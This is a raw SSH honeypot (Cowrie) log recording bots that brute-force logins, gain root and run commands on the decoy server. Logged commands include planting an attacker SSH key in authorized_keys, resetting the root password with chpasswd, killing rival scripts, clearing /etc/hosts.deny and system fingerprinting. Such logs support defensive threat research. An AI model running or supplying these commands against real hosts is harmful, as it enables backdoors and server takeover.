{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:58.595577Z","src_ip":"103.217.145.104","session":"140e5b305540"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:17:58.886214Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:58.887077Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:17:59.231651Z","src_ip":"103.217.145.104","session":"140e5b305540"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:17:59.232362Z","src_ip":"103.217.145.104","session":"140e5b305540"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":46838,"dst_ip":"1.2.3.4","dst_port":22,"session":"e46bc124505c","protocol":"ssh","message":"New connection: 68.183.87.241:46838 (1.2.3.4:22) [session: e46bc124505c]","sensor":"my-vps","timestamp":"2025-08-26T04:17:59.234929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:17:59.236004Z","src_ip":"68.183.87.241","session":"e46bc124505c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:17:59.550428Z","src_ip":"68.183.87.241","session":"e46bc124505c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:17:59.853869Z","src_ip":"103.217.145.104","session":"140e5b305540"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:59.855370Z","src_ip":"103.217.145.104","session":"140e5b305540"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":50740,"dst_ip":"1.2.3.4","dst_port":22,"session":"c90e7bee65d3","protocol":"ssh","message":"New connection: 103.217.145.104:50740 (1.2.3.4:22) [session: c90e7bee65d3]","sensor":"my-vps","timestamp":"2025-08-26T04:18:00.121854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:18:00.122650Z","src_ip":"103.217.145.104","session":"c90e7bee65d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:18:00.395679Z","src_ip":"103.217.145.104","session":"c90e7bee65d3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:18:01.510399Z","src_ip":"103.217.145.104","session":"c90e7bee65d3"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59652,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2ba4e17c812","protocol":"ssh","message":"New connection: 217.72.205.35:59652 (1.2.3.4:22) [session: a2ba4e17c812]","sensor":"my-vps","timestamp":"2025-08-26T04:18:01.906516Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:01.907674Z","src_ip":"217.72.205.35","session":"a2ba4e17c812"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:02.780009Z","src_ip":"103.217.145.104","session":"c90e7bee65d3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:18:02.790387Z","src_ip":"68.183.87.241","session":"e46bc124505c"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":50748,"dst_ip":"1.2.3.4","dst_port":22,"session":"e63103fb036e","protocol":"ssh","message":"New connection: 103.217.145.104:50748 (1.2.3.4:22) [session: e63103fb036e]","sensor":"my-vps","timestamp":"2025-08-26T04:18:03.047763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:18:03.048924Z","src_ip":"103.217.145.104","session":"e63103fb036e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:18:03.317111Z","src_ip":"103.217.145.104","session":"e63103fb036e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:18:04.429916Z","src_ip":"103.217.145.104","session":"e63103fb036e"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:04.699580Z","src_ip":"103.217.145.104","session":"140e5b305540"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:04.701458Z","src_ip":"103.217.145.104","session":"e63103fb036e"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:05.145273Z","src_ip":"68.183.87.241","session":"e46bc124505c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60950,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f09b8e57879","protocol":"ssh","message":"New connection: 212.227.235.229:60950 (1.2.3.4:22) [session: 8f09b8e57879]","sensor":"my-vps","timestamp":"2025-08-26T04:18:05.635217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:18:05.755800Z","src_ip":"212.227.235.229","session":"8f09b8e57879"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:18:06.064903Z","src_ip":"212.227.235.229","session":"8f09b8e57879"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123","message":"login attempt [admin/123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:18:07.498247Z","src_ip":"212.227.235.229","session":"8f09b8e57879"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:09.671228Z","src_ip":"212.227.235.229","session":"8f09b8e57879"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":60972,"dst_ip":"1.2.3.4","dst_port":22,"session":"bef58823aa04","protocol":"ssh","message":"New connection: 68.183.87.241:60972 (1.2.3.4:22) [session: bef58823aa04]","sensor":"my-vps","timestamp":"2025-08-26T04:18:11.629950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:18:13.420247Z","src_ip":"68.183.87.241","session":"bef58823aa04"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:18:19.695238Z","src_ip":"68.183.87.241","session":"bef58823aa04"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:19.696629Z","src_ip":"68.183.87.241","session":"bef58823aa04"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:21.786627Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T04:18:21.787340Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:23.018726Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:25.244139Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"echo \"root:YRJMbkielRpv\"|chpasswd|bash","message":"CMD: echo \"root:YRJMbkielRpv\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T04:18:25.244849Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/47b3475a2bed11179712f250e6f5373a080e5b60cf0fea65ce5ac1d4b8c069fc","size":21,"shasum":"47b3475a2bed11179712f250e6f5373a080e5b60cf0fea65ce5ac1d4b8c069fc","duplicate":false,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/47b3475a2bed11179712f250e6f5373a080e5b60cf0fea65ce5ac1d4b8c069fc after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:25.835054Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:28.083024Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T04:18:28.083589Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T04:18:29.407424Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:29.408582Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:34.980497Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T04:18:34.981360Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:36.684621Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:40.236367Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T04:18:40.237094Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":26,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:40.564878Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:41.393426Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T04:18:41.394134Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T04:18:41.394601Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:41.739552Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:42.516867Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T04:18:42.517548Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
